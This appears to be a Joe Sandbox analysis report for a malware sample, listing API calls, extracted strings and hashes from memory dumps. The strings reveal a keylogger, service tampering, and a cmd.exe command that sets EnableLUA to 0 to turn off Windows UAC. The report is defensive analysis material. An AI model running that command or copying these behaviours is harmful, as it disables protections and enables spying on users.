                                              • Opcode Fuzzy Hash: 3090eec41fb7608d2e46825d5079eb797cb4455543321b0ca90740b8f140afc5
                                              • Instruction Fuzzy Hash: 7FD1F331900206CBDB288F68CD55BBEB7B0FF05350F254159E985AB6D9E3F59DA0CBA0
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,000D9507,00000000,00000000), ref: 000D9DFC
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,000D9507,00000000,00000000), ref: 000D9E10
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,000D9507,00000000,00000000), ref: 000D9E1D
                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,000D9507), ref: 000D9E52
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,000D9507,00000000,00000000), ref: 000D9E64
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,000D9507,00000000,00000000), ref: 000D9E67
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                              • String ID:
                                              • API String ID: 493672254-0
                                              • Opcode ID: d988dbffb126a8ced969d8b30ed06f75c41cb853d15e2714200f588877d6e1b3
                                              • Instruction ID: 796f99d50f752869d453c78032900e13dc3dba2ba8ba29a42b48e57ae5f84856
                                              • Opcode Fuzzy Hash: d988dbffb126a8ced969d8b30ed06f75c41cb853d15e2714200f588877d6e1b3
                                              • Instruction Fuzzy Hash: F701D2311483147AD6159768AD4EEBF3BACDB46370F10420AF521963C1DA60CE4191B0
                                              APIs
                                              • GetLastError.KERNEL32(?,?,000F7DFD,000F77B1), ref: 000F7E14
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000F7E22
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000F7E3B
                                              • SetLastError.KERNEL32(00000000,?,000F7DFD,000F77B1), ref: 000F7E8D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: ee8de85554cee9ce71e77fefffa6d33e36abd5c50ba281fac5e40834adc17d7c
                                              • Instruction ID: 77a541ea865484a8427c558bcd6b489265d228e56abac613f1684d19fe403689
                                              • Opcode Fuzzy Hash: ee8de85554cee9ce71e77fefffa6d33e36abd5c50ba281fac5e40834adc17d7c
                                              • Instruction Fuzzy Hash: A501D83231C31D5DDA6926746D85ABB26D9DB0A3B4B20037BF72881DF2EF614C41B242
                                              APIs
                                              • GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                              • _free.LIBCMT ref: 00106EF6
                                              • _free.LIBCMT ref: 00106F1E
                                              • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F2B
                                              • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                              • _abort.LIBCMT ref: 00106F3D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: 84fec61700b138ee09ae22c898ceb5ac410d1d0e412a1607ac3b19406f6251ad
                                              • Instruction ID: fc978750c33b13b5fbb8ed7b665e7c76bb73ee4ed6c6a2c365cdf052953ed763
                                              • Opcode Fuzzy Hash: 84fec61700b138ee09ae22c898ceb5ac410d1d0e412a1607ac3b19406f6251ad
                                              • Instruction Fuzzy Hash: 14F0283960870277C6267374ED16EAF25659BE27B0F254014F984E22D6EFF08C624121
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,000D979B,00000000,00000000), ref: 000D9C2F
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,000D979B,00000000,00000000), ref: 000D9C43
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D979B,00000000,00000000), ref: 000D9C50
                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,000D979B,00000000,00000000), ref: 000D9C5F
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D979B,00000000,00000000), ref: 000D9C71
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D979B,00000000,00000000), ref: 000D9C74
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: f33ab71cff5cc3a5d3692edee01d00de9c92b854bad4438bbaaab0d7b7bb4ac8
                                              • Instruction ID: 0f759c922b053c80a4b21fcb8e374e5c79997b074300b6c354e535c02a96e14c
                                              • Opcode Fuzzy Hash: f33ab71cff5cc3a5d3692edee01d00de9c92b854bad4438bbaaab0d7b7bb4ac8
                                              • Instruction Fuzzy Hash: 44F0F6325403147BD3146B64AD89EFF3B7CDB4A360F004015F901D2282DB64CE8595F0
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,000D9719,00000000,00000000), ref: 000D9D31
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,000D9719,00000000,00000000), ref: 000D9D45
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D9719,00000000,00000000), ref: 000D9D52
                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,000D9719,00000000,00000000), ref: 000D9D61
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D9719,00000000,00000000), ref: 000D9D73
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D9719,00000000,00000000), ref: 000D9D76
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: d2ef2177cfd91f18a9ff4766ff8011e1ae8666074391cb9a4efa5c7966ea24c2
                                              • Instruction ID: d0d96b0d2a527cb140263e7ddcb5a2225cb4c6a5e6e8f324c7b22f7e70fbcf5e
                                              • Opcode Fuzzy Hash: d2ef2177cfd91f18a9ff4766ff8011e1ae8666074391cb9a4efa5c7966ea24c2
                                              • Instruction Fuzzy Hash: 6EF062725443147BD2156B64AC89EFF3B7CDB4A761B004019FA0692292DB74CE4696B0
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,000D9697,00000000,00000000), ref: 000D9D96
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,000D9697,00000000,00000000), ref: 000D9DAA
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D9697,00000000,00000000), ref: 000D9DB7
                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,000D9697,00000000,00000000), ref: 000D9DC6
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D9697,00000000,00000000), ref: 000D9DD8
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D9697,00000000,00000000), ref: 000D9DDB
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: 0cb31413cc06ec0bb6c938e81c59c2588e7075c9119cd748a184f9b1a598c26d
                                              • Instruction ID: 4e59bcab5073edf3a51eed5f6f85f63609ed22aa7e8745681a85863083bf6df9
                                              • Opcode Fuzzy Hash: 0cb31413cc06ec0bb6c938e81c59c2588e7075c9119cd748a184f9b1a598c26d
                                              • Instruction Fuzzy Hash: 98F090725443187BD715AB64AC89EFF3B7CDB4A6A0F04401AFE05D2282DB64CE8696B0
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004930C2
                                              • __allrem.LIBCMT ref: 00493163
                                              • __allrem.LIBCMT ref: 00493211
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00493232
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID: gfff
                                              • API String ID: 1992179935-1553575800
                                              • Opcode ID: 909063c54548ab0acba61d0d3cc2af11cb58f79ae02012acdd2ebfa6cf058626
                                              • Instruction ID: 8483a46b589cb985f3b50d97f83bcfce0800402eec219d4dcdb42ed114fc504e
                                              • Opcode Fuzzy Hash: 909063c54548ab0acba61d0d3cc2af11cb58f79ae02012acdd2ebfa6cf058626
                                              • Instruction Fuzzy Hash: BB71E5727143108BCB18CF19DC41A2BBBD6AFD5314F49893EF445CB3A1E678EA098796
                                              APIs
                                                • Part of subcall function 000D2584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 000D25A6
                                                • Part of subcall function 000D2584: RegQueryValueExW.ADVAPI32(?,000CE0BA,00000000,00000000,?,00000400), ref: 000D25C5
                                                • Part of subcall function 000D2584: RegCloseKey.ADVAPI32(?), ref: 000D25CE
                                                • Part of subcall function 000DB15B: GetCurrentProcess.KERNEL32(?,?,?,000CC914,WinDir,00000000,00000000), ref: 000DB16C
                                              • _wcslen.LIBCMT ref: 000DA8F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                              • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                              • API String ID: 37874593-4246244872
                                              • Opcode ID: f483ae5e0fc1a96ffe13c0bd3d34ac4bf8bd784c3f55ddfa29968e5893e14c62
                                              • Instruction ID: aebea86a11615110e955b022d99819f54a15e63fbbcb3b22947d269e6f22391d
                                              • Opcode Fuzzy Hash: f483ae5e0fc1a96ffe13c0bd3d34ac4bf8bd784c3f55ddfa29968e5893e14c62
                                              • Instruction Fuzzy Hash: 49215372B002086BDB18BBB49C97EEE77AD9B45350B15053EF402E72C3EE749D298761
                                              APIs
                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 000CA884
                                              • wsprintfW.USER32 ref: 000CA905
                                                • Part of subcall function 000C9D58: SetEvent.KERNEL32(?,?,00000000,000CA91C,00000000), ref: 000C9D84
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EventLocalTimewsprintf
                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                              • API String ID: 1497725170-248792730
                                              • Opcode ID: 248814931c9e52931ce5c22aeb3aa9bfd30999a1d82fe0c90e5ee5734ef811c1
                                              • Instruction ID: 5bd141a5c5895b2aec551bc853c680191d0aef3404df200dbc2dab02785e4123
                                              • Opcode Fuzzy Hash: 248814931c9e52931ce5c22aeb3aa9bfd30999a1d82fe0c90e5ee5734ef811c1
                                              • Instruction Fuzzy Hash: AB116372504018BACB18BB94EC56DFF77B8AF49361B10411EF402A6193EF785A86D6A4
                                              APIs
                                              • RegisterClassExA.USER32(00000030), ref: 000DCA6C
                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 000DCA87
                                              • GetLastError.KERNEL32 ref: 000DCA91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ClassCreateErrorLastRegisterWindow
                                              • String ID: 0$MsgWindowClass
                                              • API String ID: 2877667751-2410386613
                                              • Opcode ID: be597c30dffb8e218fc524589142d287a01f86f2c4649810af9585d4053eb1ff
                                              • Instruction ID: ef8f60f091d566150f18ccb170d7e398171b81fdb0ba378acb6493e3a2fe5607
                                              • Opcode Fuzzy Hash: be597c30dffb8e218fc524589142d287a01f86f2c4649810af9585d4053eb1ff
                                              • Instruction Fuzzy Hash: 3C0129B1D1031EAB9B00CFE9DDC49EFBBBCBF49248B50452AE410B2240E7704A458FA1
                                              APIs
                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 000C6A00
                                              • CloseHandle.KERNEL32(?), ref: 000C6A0F
                                              • CloseHandle.KERNEL32(?), ref: 000C6A14
                                              Strings
                                              • C:\Windows\System32\cmd.exe, xrefs: 000C69FB
                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 000C69F6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle$CreateProcess
                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                              • API String ID: 2922976086-4183131282
                                              • Opcode ID: 9f278fd609238f6d64cad811abf7296060d94ec275b95c2df9126d9ac7e05f0e
                                              • Instruction ID: 75309e354acf0123f1cb999f0e049635791bc996cd9c46a51c01fbffeab29a21
                                              • Opcode Fuzzy Hash: 9f278fd609238f6d64cad811abf7296060d94ec275b95c2df9126d9ac7e05f0e
                                              • Instruction Fuzzy Hash: 47F090729002ACBACB20ABD69C0DEDF7F3CEBC1B10F000419B605A6191D6705540CAB4
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0010258A,001053F8,?,0010252A,001053F8,0012DAE0,0000000C,00102681,001053F8,00000002), ref: 001025F9
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0010260C
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0010258A,001053F8,?,0010252A,001053F8,0012DAE0,0000000C,00102681,001053F8,00000002,00000000), ref: 0010262F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: bb2249a3a42db93ba86b486501c84b8dde2fa548b1c7f33f66525022e5cc355f
                                              • Instruction ID: 102feb68821787254f7710ee33a67314f3cd2d0b4e960b6b0c2e2c88a11ed83d
                                              • Opcode Fuzzy Hash: bb2249a3a42db93ba86b486501c84b8dde2fa548b1c7f33f66525022e5cc355f
                                              • Instruction Fuzzy Hash: 68F04430904219FBCB199F65DD0DBEDBFB8EB08751F004068F805A2690DF719D81CA95
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C4AED
                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000C483F,00000001), ref: 000C4AF9
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,000C483F,00000001), ref: 000C4B04
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000C483F,00000001), ref: 000C4B0D
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                              • String ID: KeepAlive | Disabled
                                              • API String ID: 2993684571-305739064
                                              • Opcode ID: 2715dda00cc925dc2fbbb0b46159c079648447b7c8ef31287ea727aae8942b70
                                              • Instruction ID: 202288759415c9af541b34d17caae75e53a49f18de4f702eab8e4d60e57f469a
                                              • Opcode Fuzzy Hash: 2715dda00cc925dc2fbbb0b46159c079648447b7c8ef31287ea727aae8942b70
                                              • Instruction Fuzzy Hash: 7BF09671908350ABDB1537749D0AAEE7EA9AB02320F00491DF491427A2DA7088918752
                                              APIs
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 000D9F64
                                              • PlaySoundW.WINMM(00000000,00000000), ref: 000D9F72
                                              • Sleep.KERNEL32(00002710), ref: 000D9F79
                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 000D9F82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                              • String ID: Alarm triggered
                                              • API String ID: 614609389-2816303416
                                              • Opcode ID: 902d79527c9160b4a98a9d8304a3f6424f6fd6edd60f8cfbd40e1d5242165d61
                                              • Instruction ID: fb3966564bde1ae5369eebf9c43c31a82fbae7a7d40ab1934acf644b09ac977e
                                              • Opcode Fuzzy Hash: 902d79527c9160b4a98a9d8304a3f6424f6fd6edd60f8cfbd40e1d5242165d61
                                              • Instruction Fuzzy Hash: 74E01A26B08120B7962433BA6E4FCEF3E39DBC3B70745406EFA0456692DA50095286F3
                                              APIs
                                                • Part of subcall function 004076BA: __EH_prolog.LIBCMT ref: 004076BF
                                                • Part of subcall function 004076BA: GetSystemDirectoryA.KERNEL32(?,00000400), ref: 004076F9
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 0040770C
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 00407786
                                              • CloseServiceHandle.ADVAPI32(?), ref: 00402DE6
                                              • CloseServiceHandle.ADVAPI32(?), ref: 00402DEE
                                              • GetLastError.KERNEL32 ref: 00402DF0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CloseHandleService_strncat$DirectoryErrorH_prologLastSystem
                                              • String ID: ERROR$Failed to start PnkBstrA service
                                              • API String ID: 2671922418-177627567
                                              • Opcode ID: ec03abff27e189f0570cde6ee349a6b5db4ab6f28ff478a2f9be88eaa58b738d
                                              • Instruction ID: 01776ab97a73c0c806ad562cde7058c9eb851f531a22512e06677a1d816b8581
                                              • Opcode Fuzzy Hash: ec03abff27e189f0570cde6ee349a6b5db4ab6f28ff478a2f9be88eaa58b738d
                                              • Instruction Fuzzy Hash: D0F090355007449FCB11AB61DC45CEA77B2FF88750F1044EDF14A9A1A0CB352A80CF05
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,000DBF02), ref: 000DBE79
                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,000DBF02), ref: 000DBE86
                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,000DBF02), ref: 000DBE93
                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,000DBF02), ref: 000DBEA6
                                              Strings
                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 000DBE99
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                              • API String ID: 3024135584-2418719853
                                              • Opcode ID: b4d569746b6627488b82e9d040f7c23004983b6c413abafc2dd20221ea00b5ff
                                              • Instruction ID: 966055499ac6e1a21239f6923849f4390f9a8dc59f4d62fc04723e9ac13f39ae
                                              • Opcode Fuzzy Hash: b4d569746b6627488b82e9d040f7c23004983b6c413abafc2dd20221ea00b5ff
                                              • Instruction Fuzzy Hash: 97E08673248248BBD31837F5AD8ECEF3B7CE785712B044515FA12907D2DA7044848670
                                              APIs
                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040903F
                                              • GetProcAddress.KERNEL32(00000000), ref: 00409046
                                              • GetCurrentProcess.KERNEL32(00000000), ref: 00409059
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: AddressCurrentHandleModuleProcProcess
                                              • String ID: IsWow64Process$kernel32
                                              • API String ID: 4190356694-3789238822
                                              • Opcode ID: 4d39c8669cf566aea2a0cfb047afcbf8134d52e3e86177dd4aa2fb2500acd86a
                                              • Instruction ID: b2889b05f1dad1e2f3c50c1bb822b6e8b82adfdb205b460a6e2e4a438975ea47
                                              • Opcode Fuzzy Hash: 4d39c8669cf566aea2a0cfb047afcbf8134d52e3e86177dd4aa2fb2500acd86a
                                              • Instruction Fuzzy Hash: 99E04F74941348EBEB40DFB1DC4DB8977ACEB04706F200065B501E25A1D7789A448B18
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8da8861976047c33e2a96445b3b3fb5c9b693f0c0acc479643fd1f748a23db9a
                                              • Instruction ID: c3292fa41abb0b7b1a37d2742f457603fbf83703dc13743c6fc6a5608451f2da
                                              • Opcode Fuzzy Hash: 8da8861976047c33e2a96445b3b3fb5c9b693f0c0acc479643fd1f748a23db9a
                                              • Instruction Fuzzy Hash: 2771913190061A9FCB278B55C884BBFBB75FF59360F144229E895AB1C1DBF09D81CBA1
                                              APIs
                                                • Part of subcall function 000D05B9: SetLastError.KERNEL32(0000000D,000D0B38,?,00000000), ref: 000D05BF
                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,000D0B15), ref: 000D0BC4
                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 000D0C2A
                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 000D0C31
                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000D0D3F
                                              • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,000D0B15), ref: 000D0D69
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
